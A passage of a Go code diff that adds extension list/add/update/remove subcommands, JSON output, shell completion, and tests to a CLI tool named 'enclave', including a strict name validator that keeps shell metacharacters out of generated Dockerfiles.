 	"enclave/internal/logx"
 	"enclave/internal/model"
 )
 
-func runFeatures(ctx *AppContext, opts model.Options, sources model.OptionSources) int {
+func runFeatures(ctx *AppContext, req *extinstall.Request, opts model.Options, sources model.OptionSources) int {
 	features, err := config.ListFeatures(ctx.Paths)
+	if err != nil {
+		logx.Errorf("%v", err)
+		return 1
+	}
+
+	inventory, err := extensionInventory(ctx.Paths, model.KindFeature, features)
 	if err != nil {
 		logx.Errorf("%v", err)
 		return 1
@@ -38,31 +46,45 @@ func runFeatures(ctx *AppContext, opts model.Options, sources model.OptionSource
 		}
 	}
 
+	if req != nil && req.JSON {
+		isAvailable := func(name string) bool {
+			_, ok := available[name]
+			return ok
+		}
+		entries := extensionListJSONEntries(features, inventory, isAvailable)
+		if err := renderExtensionListJSON(os.Stdout, model.KindFeature, entries); err != nil {
+			logx.Errorf("%v", err)
+			return 1
+		}
+		return 0
+	}
+
 	for _, feature := range features {
+		suffix := provenanceSuffix(inventory[feature.Name])
 		switch {
 		case opts.Slim:
 			src := formatSource(sources.Slim, ctx.ProjectDir)
 			if src != "" {
-				fmt.Printf("✗ %s (disabled by --slim from %s)\n", feature.Name, src)
+				fmt.Printf("✗ %s%s (disabled by --slim from %s)\n", feature.Name, suffix, src)
 			} else {
-				fmt.Printf("✗ %s (disabled by --slim)\n", feature.Name)
+				fmt.Printf("✗ %s%s (disabled by --slim)\n", feature.Name, suffix)
 			}
 		case opts.Features != nil:
 			if _, ok := available[feature.Name]; ok {
-				fmt.Printf("✓ %s\n", feature.Name)
+				fmt.Printf("✓ %s%s\n", feature.Name, suffix)
 			} else {
 				src := formatSource(sources.Features, ctx.ProjectDir)
 				if src != "" {
-					fmt.Printf("✗ %s (disabled by features from %s)\n", feature.Name, src)
+					fmt.Printf("✗ %s%s (disabled by features from %s)\n", feature.Name, suffix, src)
 				} else {
-					fmt.Printf("✗ %s (disabled by features)\n", feature.Name)
+					fmt.Printf("✗ %s%s (disabled by features)\n", feature.Name, suffix)
 				}
 			}
 		default:
 			if _, ok := available[feature.Name]; ok {
-				fmt.Printf("✓ %s\n", feature.Name)
+				fmt.Printf("✓ %s%s\n", feature.Name, suffix)
 			} else {
-				fmt.Printf("✗ %s (opt-in)\n", feature.Name)
+				fmt.Printf("✗ %s%s (opt-in)\n", feature.Name, suffix)
 			}
 		}
 	}

--- a/internal/app/features_test.go
+++ b/internal/app/features_test.go
@@ -1,0 +1,107 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package app
+
+import (
+	"encoding/json"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/model"
+)
+
+// displayName is part of the documented `list --json` contract.
+func TestRunFeaturesJSONPopulatesDisplayName(t *testing.T) {
+	tmp := t.TempDir()
+	featuresDir := filepath.Join(tmp, "extensions", "features")
+	spec := "schemaVersion: \"1\"\nkind: mixin\nname: demo\ndisplayName: Demo Feature\n"
+	writeAppFile(t, filepath.Join(featuresDir, "demo", "spec.yaml"), spec, 0o644)
+
+	ctx := NewAppContext(model.Paths{FeaturesDir: featuresDir}, tmp)
+	req := &extinstall.Request{Kind: model.KindFeature, JSON: true}
+
+	out := captureStdout(t, func() {
+		if code := runFeatures(ctx, req, model.Options{}, model.OptionSources{}); code != 0 {
+			t.Errorf("runFeatures exit code = %d", code)
+		}
+	})
+
+	var decoded struct {
+		Extensions []struct {
+			Name        string `json:"name"`
+			DisplayName string `json:"displayName"`
+		} `json:"extensions"`
+	}
+	if err := json.Unmarshal([]byte(out), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out)
+	}
+	if len(decoded.Extensions) != 1 || decoded.Extensions[0].DisplayName != "Demo Feature" {
+		t.Fatalf("extensions = %+v, want displayName populated", decoded.Extensions)
+	}
+}
+
+// `list` renders local modifications in both output shapes.
+func TestRunFeaturesReportsLocalModification(t *testing.T) {
+	tmp := t.TempDir()
+	featuresDir := filepath.Join(tmp, "extensions", "features")
+	userFeaturesDir := filepath.Join(tmp, "user", "extensions", "features")
+	extDir := filepath.Join(userFeaturesDir, "demo")
+	writeAppFile(t, filepath.Join(extDir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: demo\n", 0o644)
+	hash, err := extinstall.TreeHash(extDir)
+	if err != nil {
+		t.Fatalf("TreeHash: %v", err)
+	}
+	if err := extinstall.WriteOrigin(extDir, extinstall.Origin{
+		SchemaVersion: extinstall.OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          "demo",
+		Remote:        "https://github.com/acme/kits",
+		Source:        "acme/kits",
+		Ref:           "main",
+		RefType:       extinstall.RefTypeBranch,
+		Commit:        "a1b2c3d4e5f6a7b8",
+		TreeHash:      hash,
+	}); err != nil {
+		t.Fatalf("WriteOrigin: %v", err)
+	}
+	writeAppFile(t, filepath.Join(extDir, "local.sh"), "echo mine\n", 0o644)
+
+	paths := model.Paths{FeaturesDir: featuresDir, UserFeaturesDir: userFeaturesDir}
+	ctx := NewAppContext(paths, tmp)
+
+	text := captureStdout(t, func() {
+		if code := runFeatures(ctx, nil, model.Options{}, model.OptionSources{}); code != 0 {
+			t.Errorf("runFeatures exit code = %d", code)
+		}
+	})
+	if !strings.Contains(text, ", modified]") {
+		t.Errorf("text listing does not mark the local edit:\n%s", text)
+	}
+
+	out := captureStdout(t, func() {
+		req := &extinstall.Request{Kind: model.KindFeature, JSON: true}
+		if code := runFeatures(ctx, req, model.Options{}, model.OptionSources{}); code != 0 {
+			t.Errorf("runFeatures --json exit code = %d", code)
+		}
+	})
+	var decoded struct {
+		Extensions []struct {
+			Origin *struct {
+				LocallyModified bool `json:"locallyModified"`
+			} `json:"origin"`
+		} `json:"extensions"`
+	}
+	if err := json.Unmarshal([]byte(out), &decoded); err != nil {
+		t.Fatalf("unmarshal: %v\n%s", err, out)
+	}
+	if len(decoded.Extensions) != 1 || decoded.Extensions[0].Origin == nil || !decoded.Extensions[0].Origin.LocallyModified {
+		t.Fatalf("extensions = %+v, want locallyModified true", decoded.Extensions)
+	}
+}

--- a/internal/app/tool_selection.go
+++ b/internal/app/tool_selection.go
@@ -32,11 +32,3 @@ func listToolExtensions(paths model.Paths) ([]model.Extension, error) {
 	}
 	return tools, nil
 }
-
-func toolNameList(tools []model.Extension) []string {
-	names := make([]string, 0, len(tools))
-	for _, tool := range tools {
-		names = append(names, tool.Name)
-	}
-	return names
-}

--- a/internal/app/tools.go
+++ b/internal/app/tools.go
@@ -9,9 +9,11 @@ package app
 
 import (
 	"fmt"
+	"os"
 	"strings"
 
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
 	"enclave/internal/logx"
 	"enclave/internal/model"
 )
@@ -34,6 +36,17 @@ func formatSource(source model.OptionSource, projectDir string) string {
 	}
 }
 
+// extensionInventory reads the provenance and local-modification state a
+// listing line renders. Passing the already-resolved names spares the installer
+// a second enumeration of the extension roots.
+func extensionInventory(paths model.Paths, kind model.ExtensionKind, exts []model.Extension) (map[string]extinstall.Managed, error) {
+	names := make([]string, 0, len(exts))
+	for _, ext := range exts {
+		names = append(names, ext.Name)
+	}
+	return extinstall.Inventory(paths, kind, names, extinstall.InventoryModifications)
+}
+
 func loadProfileOrReport(paths model.Paths, tool string) (model.Profile, error) {
 	profile, err := config.LoadProfile(paths, tool)
 	if err != nil {
@@ -45,21 +58,38 @@ func loadProfileOrReport(paths model.Paths, tool string) (model.Profile, error) 
 	return profile, err
 }
 
-func runTools(ctx *AppContext, opts model.Options, _ model.OptionSources) int {
+func runTools(ctx *AppContext, req *extinstall.Request, opts model.Options, _ model.OptionSources) int {
 	toolExts, err := listToolExtensions(ctx.Paths)
 	if err != nil {
 		logx.Errorf("%v", err)
 		return 1
 	}
 
+	inventory, err := extensionInventory(ctx.Paths, model.KindTool, toolExts)
+	if err != nil {
+		logx.Errorf("%v", err)
+		return 1
+	}
+
+	if req != nil && req.JSON {
+		alwaysEnabled := func(string) bool { return true }
+		entries := extensionListJSONEntries(toolExts, inventory, alwaysEnabled)
+		if err := renderExtensionListJSON(os.Stdout, model.KindTool, entries); err != nil {
+			logx.Errorf("%v", err)
+			return 1
+		}
+		return 0
+	}
+
 	// Images are per-tool, so every profile is selectable with --tool; mark the
 	// one that would run by default for this invocation.
 	active := strings.TrimSpace(opts.Tool)
-	for _, profile := range toolNameList(toolExts) {
-		if profile == active {
-			fmt.Printf("✓ %s (selected)\n", profile)
+	for _, tool := range toolExts {
+		suffix := provenanceSuffix(inventory[tool.Name])
+		if tool.Name == active {
+			fmt.Printf("✓ %s%s (selected)\n", tool.Name, suffix)
 		} else {
-			fmt.Printf("✓ %s\n", profile)
+			fmt.Printf("✓ %s%s\n", tool.Name, suffix)
 		}
 	}
 	return 0

--- a/internal/cli/completion.go
+++ b/internal/cli/completion.go
@@ -13,10 +13,13 @@ import (
 	"fmt"
 	"io"
 	"os"
+	"sort"
+	"strings"
 
 	"github.com/spf13/cobra"
 
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
 	"enclave/internal/model"
 )
 
@@ -158,6 +161,22 @@ func registerCompletions(rootCmd *cobra.Command) error {
 		updateCmd.ValidArgsFunction = toolCompleter
 	}
 
+	// add --name names an extension in the source, not on this host; installed
+	// names are only a hint for re-adding one.
+	for _, kind := range []model.ExtensionKind{model.KindFeature, model.KindTool} {
+		completer := installedExtensionCompleter(kind)
+		for _, sub := range []string{"remove", "update"} {
+			if cmd := findSubCommand(rootCmd, kind.Verb(), sub); cmd != nil {
+				cmd.ValidArgsFunction = completer
+			}
+		}
+		if cmd := findSubCommand(rootCmd, kind.Verb(), "add"); cmd != nil {
+			if err := cmd.RegisterFlagCompletionFunc("name", completer); err != nil {
+				return err
+			}
+		}
+	}
+
 	// `config --view` accepts a fixed set of render modes. The flag lives on the
 	// `config` leaf command, not in the shared option set, so register it here
 	// rather than via the completers map above.
@@ -175,6 +194,34 @@ func registerCompletions(rootCmd *cobra.Command) error {
 		}
 	}
 	return errors.Join(errs...)
+}
+
+// installedExtensionCompleter completes the user-installed extension names of
+// kind.
+func installedExtensionCompleter(kind model.ExtensionKind) flagCompletionFunc {
+	return func(_ *cobra.Command, _ []string, toComplete string) ([]string, cobra.ShellCompDirective) {
+		paths, err := config.ResolvePaths()
+		if err != nil {
+			return nil, cobra.ShellCompDirectiveNoFileComp
+		}
+		// Completion runs on every keystroke: names and source labels only, no
+		// provenance sidecar and no hashing of installed content.
+		inventory, err := extinstall.Inventory(paths, kind, nil, extinstall.InventoryNames)
+		if err != nil {
+			return nil, cobra.ShellCompDirectiveNoFileComp
+		}
+		names := make([]string, 0, len(inventory))
+		for name, entry := range inventory {
+			if entry.Source == config.SourceBuiltin {
+				continue
+			}
+			if strings.HasPrefix(name, toComplete) {
+				names = append(names, name)
+			}
+		}
+		sort.Strings(names)
+		return names, cobra.ShellCompDirectiveNoFileComp
+	}
 }
 
 func staticValuesCompleter(values ...string) flagCompletionFunc {

--- a/internal/cli/completion.go
+++ b/internal/cli/completion.go
@@ -166,11 +166,11 @@ func registerCompletions(rootCmd *cobra.Command) error {
 	for _, kind := range []model.ExtensionKind{model.KindFeature, model.KindTool} {
 		completer := installedExtensionCompleter(kind)
 		for _, sub := range []string{"remove", "update"} {
-			if cmd := findSubCommand(rootCmd, kind.Verb(), sub); cmd != nil {
+			if cmd := findSubCommand(rootCmd, kind.DirName(), sub); cmd != nil {
 				cmd.ValidArgsFunction = completer
 			}
 		}
-		if cmd := findSubCommand(rootCmd, kind.Verb(), "add"); cmd != nil {
+		if cmd := findSubCommand(rootCmd, kind.DirName(), "add"); cmd != nil {
 			if err := cmd.RegisterFlagCompletionFunc("name", completer); err != nil {
 				return err
 			}

--- a/internal/cli/completion_test.go
+++ b/internal/cli/completion_test.go
@@ -82,3 +82,42 @@ func TestRegisterCompletionsRejectsMissingFlag(t *testing.T) {
 		t.Fatal("expected error registering completion for a missing flag, got nil")
 	}
 }
+
+func TestRegisterCompletionsCoversExtensionSubcommands(t *testing.T) {
+	rootCmd := &cobra.Command{Use: "enclave"}
+	res := Result{}
+	addOptionFlags(rootCmd.PersistentFlags(), &res.Options, &res.Sources,
+		config.OptionGroupGlobal,
+		config.OptionGroupRun,
+		config.OptionGroupAuth,
+		config.OptionGroupBuild,
+	)
+	rootCmd.AddCommand(featuresCommand(&res), toolsCommand(&res))
+	if err := registerCompletions(rootCmd); err != nil {
+		t.Fatalf("registerCompletions: %v", err)
+	}
+
+	for _, path := range [][]string{
+		{"features", "remove"},
+		{"features", "update"},
+		{"tools", "remove"},
+		{"tools", "update"},
+	} {
+		cmd := findSubCommand(rootCmd, path...)
+		if cmd == nil {
+			t.Fatalf("%v not registered", path)
+		}
+		if cmd.ValidArgsFunction == nil {
+			t.Errorf("%v has no argument completion", path)
+		}
+	}
+	for _, path := range [][]string{{"features", "add"}, {"tools", "add"}} {
+		cmd := findSubCommand(rootCmd, path...)
+		if cmd == nil {
+			t.Fatalf("%v not registered", path)
+		}
+		if cmd.Flags().Lookup("name") == nil {
+			t.Errorf("%v has no --name flag to complete", path)
+		}
+	}
+}

--- a/internal/cli/extension_manage_command.go
+++ b/internal/cli/extension_manage_command.go
@@ -1,0 +1,149 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package cli
+
+import (
+	"fmt"
+
+	"github.com/spf13/cobra"
+	"github.com/spf13/pflag"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/model"
+)
+
+// ActionExtensionManage is the action every extension-management verb reports.
+// Which kind and which verb it was are carried as typed values on
+// Result.ExtRequest.
+const ActionExtensionManage = "extension-manage"
+
+// addExtensionSubcommands registers the extension-management verbs under a
+// kind's parent command. listOptionNames are the parent's option flags that
+// `list` repeats.
+func addExtensionSubcommands(cmd *cobra.Command, res *Result, kind model.ExtensionKind, listOptionNames ...string) {
+	cmd.AddCommand(
+		listSubcommand(res, kind, listOptionNames...),
+		addSubcommand(res, kind),
+		updateSubcommand(res, kind),
+		removeSubcommand(res, kind),
+	)
+}
+
+// listSubcommand adds an explicit `list` verb that reuses the parent's action,
+// so `enclave features` and `enclave features list` are one code path.
+func listSubcommand(res *Result, kind model.ExtensionKind, optionNames ...string) *cobra.Command {
+	var asJSON bool
+	cmd := &cobra.Command{
+		Use:   "list",
+		Short: "List " + kind.Label() + " extensions",
+		Args:  cobra.NoArgs,
+		RunE: func(_ *cobra.Command, _ []string) error {
+			res.Action = kind.Verb()
+			res.ExtRequest = &extinstall.Request{Kind: kind, Op: extinstall.OpList, JSON: asJSON}
+			return nil
+		},
+	}
+	cmd.Flags().BoolVar(&asJSON, "json", false, "Emit machine-readable JSON")
+	addOptionFlagsByName(cmd.Flags(), &res.Options, &res.Sources, optionNames...)
+	return cmd
+}
+
+// addExtensionActionFlags registers the flags every extension-management verb
+// accepts. forceUsage varies: --force overrides a different check per verb.
+func addExtensionActionFlags(flags *pflag.FlagSet, request *extinstall.Request, forceUsage string) {
+	flags.BoolVarP(&request.Yes, "yes", "y", false, "Do not prompt for confirmation")
+	flags.BoolVar(&request.Force, "force", false, forceUsage)
+	flags.BoolVar(&request.JSON, "json", false, "Emit machine-readable JSON (requires --yes)")
+}
+
+// publishExtensionRequest records the request on the result and validates it.
+// The request is published even when validation fails, so the caller can report
+// the rejection in the verb's own output format.
+func publishExtensionRequest(res *Result, request *extinstall.Request) error {
+	res.Action = ActionExtensionManage
+	res.ExtRequest = request
+	return validateExtensionRequest(request)
+}
+
+// validateExtensionRequest rejects the flag combinations no extension verb can
+// honour and derives Request.Interactive from them.
+func validateExtensionRequest(request *extinstall.Request) error {
+	if request.JSON && !request.Yes {
+		return fmt.Errorf("--json cannot prompt; pass --yes")
+	}
+	if request.All && len(request.Names) > 0 {
+		return fmt.Errorf("--all and --name are mutually exclusive")
+	}
+	if request.Path != "" && len(request.Names) > 0 {
+		return fmt.Errorf("--path and --name are mutually exclusive")
+	}
+	request.Interactive = !request.Yes && !request.JSON
+	return nil
+}
+
+func addSubcommand(res *Result, kind model.ExtensionKind) *cobra.Command {
+	request := extinstall.Request{Kind: kind, Op: extinstall.OpAdd}
+	cmd := &cobra.Command{
+		Use:   "add <source>",
+		Short: "Install a " + kind.Label() + " extension from a git repository",
+		Long: "Install a " + kind.Label() + " extension from a git repository.\n\n" +
+			"Sources may be owner/repo shorthands (optionally followed by a path inside\n" +
+			"the repository), https or ssh repository URLs, forge tree URLs, or local\n" +
+			"paths to a git repository. With no path, the repository is searched for\n" +
+			kind.Label() + " extensions.",
+		Args: cobra.ExactArgs(1),
+		RunE: func(_ *cobra.Command, args []string) error {
+			request.Source = args[0]
+			return publishExtensionRequest(res, &request)
+		},
+	}
+	flags := cmd.Flags()
+	flags.StringVar(&request.Path, "path", "", "Path to the extension directory inside the repository")
+	flags.StringVar(&request.Ref, "ref", "", "Branch, tag, or commit to install")
+	flags.StringArrayVar(&request.Names, "name", nil, "Install only the named extension (repeatable)")
+	flags.BoolVar(&request.All, "all", false, "Install every matching extension found in the source")
+	flags.BoolVar(&request.DryRun, "dry-run", false, "Show what would be installed and write nothing")
+	addExtensionActionFlags(flags, &request, "Replace an existing or hand-edited extension")
+	return cmd
+}
+
+func updateSubcommand(res *Result, kind model.ExtensionKind) *cobra.Command {
+	request := extinstall.Request{Kind: kind, Op: extinstall.OpUpdate}
+	cmd := &cobra.Command{
+		Use:   "update [<name>...]",
+		Short: "Update installed " + kind.Label() + " extensions",
+		Long: "Update installed " + kind.Label() + " extensions to the newest commit of the ref\n" +
+			"they were installed from. With no names, every extension installed from a\n" +
+			"git source is updated. This does not rebuild images; see `enclave update`.",
+		Args: cobra.ArbitraryArgs,
+		RunE: func(_ *cobra.Command, args []string) error {
+			request.Names = append(request.Names, args...)
+			return publishExtensionRequest(res, &request)
+		},
+	}
+	flags := cmd.Flags()
+	flags.StringVar(&request.Ref, "ref", "", "Update to this branch, tag, or commit (single extension only)")
+	flags.BoolVar(&request.DryRun, "dry-run", false, "Show what would change and write nothing")
+	addExtensionActionFlags(flags, &request, "Discard local modifications")
+	return cmd
+}
+
+func removeSubcommand(res *Result, kind model.ExtensionKind) *cobra.Command {
+	request := extinstall.Request{Kind: kind, Op: extinstall.OpRemove}
+	cmd := &cobra.Command{
+		Use:   "remove <name>...",
+		Short: "Remove installed " + kind.Label() + " extensions",
+		Args:  cobra.MinimumNArgs(1),
+		RunE: func(_ *cobra.Command, args []string) error {
+			request.Names = append(request.Names, args...)
+			return publishExtensionRequest(res, &request)
+		},
+	}
+	addExtensionActionFlags(cmd.Flags(), &request, "Remove an extension enclave did not install")
+	return cmd
+}

--- a/internal/cli/extension_manage_command.go
+++ b/internal/cli/extension_manage_command.go
@@ -43,7 +43,7 @@ func listSubcommand(res *Result, kind model.ExtensionKind, optionNames ...string
 		Short: "List " + kind.Label() + " extensions",
 		Args:  cobra.NoArgs,
 		RunE: func(_ *cobra.Command, _ []string) error {
-			res.Action = kind.Verb()
+			res.Action = kind.DirName()
 			res.ExtRequest = &extinstall.Request{Kind: kind, Op: extinstall.OpList, JSON: asJSON}
 			return nil
 		},

--- a/internal/cli/extension_manage_command_test.go
+++ b/internal/cli/extension_manage_command_test.go
@@ -1,0 +1,100 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package cli
+
+import (
+	"testing"
+
+	"enclave/internal/extinstall"
+	"enclave/internal/model"
+)
+
+// The rejection messages are user-visible, so they are asserted verbatim.
+func TestParseExtensionFlagCombinations(t *testing.T) {
+	cases := []struct {
+		name string
+		args []string
+		want string
+	}{
+		{
+			name: "add --json without --yes",
+			args: []string{"features", "add", "acme/kits", "--json"},
+			want: "--json cannot prompt; pass --yes",
+		},
+		{
+			name: "update --json without --yes",
+			args: []string{"features", "update", "--json"},
+			want: "--json cannot prompt; pass --yes",
+		},
+		{
+			name: "remove --json without --yes",
+			args: []string{"tools", "remove", "demo", "--json"},
+			want: "--json cannot prompt; pass --yes",
+		},
+		{
+			name: "add --all with --name",
+			args: []string{"features", "add", "acme/kits", "--all", "--name", "foo"},
+			want: "--all and --name are mutually exclusive",
+		},
+		{
+			name: "add --path with --name",
+			args: []string{"features", "add", "acme/kits", "--path", "extensions/features/foo", "--name", "foo"},
+			want: "--path and --name are mutually exclusive",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			res, err := Parse(tc.args, model.Options{})
+			if err == nil {
+				t.Fatalf("Parse(%v) was accepted, request = %+v", tc.args, res.ExtRequest)
+			}
+			if err.Error() != tc.want {
+				t.Fatalf("error = %q, want %q", err.Error(), tc.want)
+			}
+			if res.Action != ActionExtensionManage || res.ExtRequest == nil {
+				t.Fatalf("action = %q, request = %+v: a rejected request must still be published", res.Action, res.ExtRequest)
+			}
+		})
+	}
+}
+
+// Interactive is derived at the CLI boundary from --yes and --json.
+func TestParseExtensionInteractivity(t *testing.T) {
+	cases := []struct {
+		name string
+		args []string
+		want bool
+	}{
+		{name: "plain add prompts", args: []string{"features", "add", "acme/kits"}, want: true},
+		{name: "--yes does not prompt", args: []string{"features", "add", "acme/kits", "--yes"}, want: false},
+		{name: "--json --yes does not prompt", args: []string{"features", "add", "acme/kits", "--json", "--yes"}, want: false},
+		{name: "plain update prompts", args: []string{"tools", "update"}, want: true},
+		{name: "remove --yes does not prompt", args: []string{"tools", "remove", "demo", "--yes"}, want: false},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			res, err := Parse(tc.args, model.Options{})
+			if err != nil {
+				t.Fatalf("Parse(%v): %v", tc.args, err)
+			}
+			if res.ExtRequest == nil {
+				t.Fatal("ExtRequest is nil")
+			}
+			if res.ExtRequest.Interactive != tc.want {
+				t.Fatalf("Interactive = %v, want %v", res.ExtRequest.Interactive, tc.want)
+			}
+		})
+	}
+}
+
+// A request built without the CLI must not be able to block on a prompt.
+func TestExtensionRequestZeroValueIsNonInteractive(t *testing.T) {
+	if (extinstall.Request{}).Interactive {
+		t.Error("a zero-value Request is interactive")
+	}
+}

--- a/internal/cli/parse.go
+++ b/internal/cli/parse.go
@@ -17,6 +17,7 @@ import (
 	"github.com/spf13/pflag"
 
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
 	"enclave/internal/model"
 	"enclave/internal/usercmd"
 )
@@ -40,6 +41,9 @@ type Result struct {
 	// Warnings collects non-fatal messages produced during parsing (e.g. a user
 	// command shadowed by a built-in). Callers log these via their own facility.
 	Warnings []string
+	// ExtRequest is set for the extension-management subcommands (`tools`/
+	// `features` list/add/remove/update); nil otherwise.
+	ExtRequest *extinstall.Request
 }
 
 func Parse(args []string, defaults model.Options, userCmds ...usercmd.Command) (Result, error) {
@@ -86,7 +90,7 @@ directly: "enclave --tool codex" is equivalent to "enclave run --tool codex".`,
 		infoCommand(&res),
 		hiddenSimpleCommand("validate-extensions", "Validate extension metadata", &res),
 		hiddenSimpleCommand("ssh-init", "Initialize SSH directory", &res),
-		simpleCommandWithTool("tools", "List available tool profiles", &res),
+		toolsCommand(&res),
 		featuresCommand(&res),
 		updateCommand(&res),
 		stopCommand(&res),
@@ -816,6 +820,13 @@ func featuresCommand(res *Result) *cobra.Command {
 	// runFeatures previews which features a run would enable; that depends on
 	// --slim and --features.
 	addOptionFlagsByName(cmd.Flags(), &res.Options, &res.Sources, "slim", "features")
+	addExtensionSubcommands(cmd, res, model.KindFeature, "slim", "features")
+	return cmd
+}
+
+func toolsCommand(res *Result) *cobra.Command {
+	cmd := simpleCommandWithTool("tools", "List available tool profiles", res)
+	addExtensionSubcommands(cmd, res, model.KindTool, "tool")
 	return cmd
 }
 

--- a/internal/cli/parse_test.go
+++ b/internal/cli/parse_test.go
@@ -15,6 +15,7 @@ import (
 	"testing"
 
 	"enclave/internal/config"
+	"enclave/internal/extinstall"
 	"enclave/internal/model"
 	"enclave/internal/usercmd"
 )
@@ -1472,5 +1473,49 @@ func TestParseValueFlagBeforeNestedCommand(t *testing.T) {
 	}
 	if res.Options.Tool != "codex" {
 		t.Fatalf("expected tool codex, got %s", res.Options.Tool)
+	}
+}
+
+func TestParseFeaturesAdd(t *testing.T) {
+	res, err := Parse([]string{"features", "add", "acme/kits", "--ref", "v1.2.0", "--name", "foo", "--yes"}, model.Options{})
+	if err != nil {
+		t.Fatalf("Parse: %v", err)
+	}
+	if res.Action != ActionExtensionManage {
+		t.Fatalf("action = %q", res.Action)
+	}
+	if res.ExtRequest == nil {
+		t.Fatal("ExtRequest is nil")
+	}
+	if res.ExtRequest.Kind != model.KindFeature || res.ExtRequest.Op != extinstall.OpAdd {
+		t.Fatalf("request = %+v", *res.ExtRequest)
+	}
+	if res.ExtRequest.Source != "acme/kits" || res.ExtRequest.Ref != "v1.2.0" {
+		t.Fatalf("request = %+v", *res.ExtRequest)
+	}
+	if len(res.ExtRequest.Names) != 1 || res.ExtRequest.Names[0] != "foo" || !res.ExtRequest.Yes {
+		t.Fatalf("request = %+v", *res.ExtRequest)
+	}
+}
+
+func TestParseToolsAddRequiresSource(t *testing.T) {
+	if _, err := Parse([]string{"tools", "add"}, model.Options{}); err == nil {
+		t.Fatal("tools add without a source was accepted")
+	}
+}
+
+func TestParseFeaturesUnknownSubcommand(t *testing.T) {
+	if _, err := Parse([]string{"features", "bogus"}, model.Options{}); err == nil {
+		t.Fatal("unknown subcommand was accepted")
+	}
+}
+
+func TestParseFeaturesBareStillLists(t *testing.T) {
+	res, err := Parse([]string{"features"}, model.Options{})
+	if err != nil {
+		t.Fatalf("Parse: %v", err)
+	}
+	if res.Action != "features" || res.ExtRequest != nil {
+		t.Fatalf("action = %q, request = %+v", res.Action, res.ExtRequest)
 	}
 }

--- a/internal/config/extension.go
+++ b/internal/config/extension.go
@@ -9,8 +9,10 @@ package config
 
 import (
 	"fmt"
+	"io/fs"
 	"os"
 	"path/filepath"
+	"regexp"
 	"sort"
 	"strings"
 
@@ -18,9 +20,56 @@ import (
 	"enclave/internal/util"
 )
 
-// ResolveToolFile resolves a tool extension file path with user override support.
-func ResolveToolFile(paths model.Paths, toolName string, fileName string) (string, bool) {
-	for _, candidate := range toolFileCandidates(paths, toolName, fileName) {
+// extensionNamePattern is the charset an extension name must match. An
+// extension name is not just a directory name: it is interpolated into the
+// generated Dockerfile as a build-context path, a COPY target, a build stage
+// name, and a FEATURES environment assignment inside a shell-form RUN. Anything
+// outside this set could carry shell metacharacters or a newline into those
+// positions, so the charset is the boundary rather than escaping at each sink.
+var extensionNamePattern = regexp.MustCompile(`^[a-z0-9][a-z0-9._-]*$`)
+
+// ExtensionNameCharset describes extensionNamePattern in user-facing words, for
+// callers that identify the offending extension by other means and so must not
+// repeat its name in the message.
+const ExtensionNameCharset = "must start with a lowercase letter or digit and use only lowercase letters, digits, \".\", \"-\", and \"_\""
+
+// ValidateExtensionName reports whether name is usable as an extension's
+// identity.
+func ValidateExtensionName(name string) error {
+	if name == "" {
+		return fmt.Errorf("extension name must not be empty")
+	}
+	if !extensionNamePattern.MatchString(name) {
+		return fmt.Errorf("invalid extension name %q: %s", name, ExtensionNameCharset)
+	}
+	return nil
+}
+
+// ExtensionRoots returns the built-in and user extension roots holding
+// extensions of kind. The user root is empty when no host config root could be
+// resolved.
+func ExtensionRoots(paths model.Paths, kind model.ExtensionKind) (builtinRoot string, userRoot string) {
+	if kind == model.KindTool {
+		return paths.ToolsDir, paths.UserToolsDir
+	}
+	return paths.FeaturesDir, paths.UserFeaturesDir
+}
+
+// withUserExtensionRoot points the user extension root of kind at root,
+// leaving every other path untouched.
+func withUserExtensionRoot(paths model.Paths, kind model.ExtensionKind, root string) model.Paths {
+	if kind == model.KindTool {
+		paths.UserToolsDir = root
+		return paths
+	}
+	paths.UserFeaturesDir = root
+	return paths
+}
+
+// ResolveExtensionFile resolves a file inside an extension of kind, preferring
+// the user extension over the built-in of the same name.
+func ResolveExtensionFile(paths model.Paths, kind model.ExtensionKind, name string, fileName string) (string, bool) {
+	for _, candidate := range extensionFileCandidates(paths, kind, name, fileName) {
 		if util.FileExists(candidate) {
 			return candidate, true
 		}
@@ -28,17 +77,23 @@ func ResolveToolFile(paths model.Paths, toolName string, fileName string) (strin
 	return "", false
 }
 
-// toolFileCandidates lists the paths ResolveToolFile searches, in its
+// extensionFileCandidates lists the paths ResolveExtensionFile searches, in its
 // precedence order: the user extension tree ahead of the built-in one.
-func toolFileCandidates(paths model.Paths, toolName string, fileName string) []string {
+func extensionFileCandidates(paths model.Paths, kind model.ExtensionKind, name string, fileName string) []string {
+	builtinRoot, userRoot := ExtensionRoots(paths, kind)
 	candidates := make([]string, 0, 2)
-	for _, toolsRoot := range []string{paths.UserToolsDir, paths.ToolsDir} {
-		if strings.TrimSpace(toolsRoot) == "" {
+	for _, root := range []string{userRoot, builtinRoot} {
+		if strings.TrimSpace(root) == "" {
 			continue
 		}
-		candidates = append(candidates, filepath.Join(toolsRoot, toolName, fileName))
+		candidates = append(candidates, filepath.Join(root, name, fileName))
 	}
 	return candidates
+}
+
+// ResolveToolFile resolves a tool extension file path with user override support.
+func ResolveToolFile(paths model.Paths, toolName string, fileName string) (string, bool) {
+	return ResolveExtensionFile(paths, model.KindTool, toolName, fileName)
 }
 
 // toolSettingsTemplateName returns the bare template filename a tool's
@@ -75,55 +130,80 @@ func ResolveToolSettingsTemplate(paths model.Paths, toolName string, settingsFil
 	relativePath := filepath.Join(model.TemplatesDir, templateName)
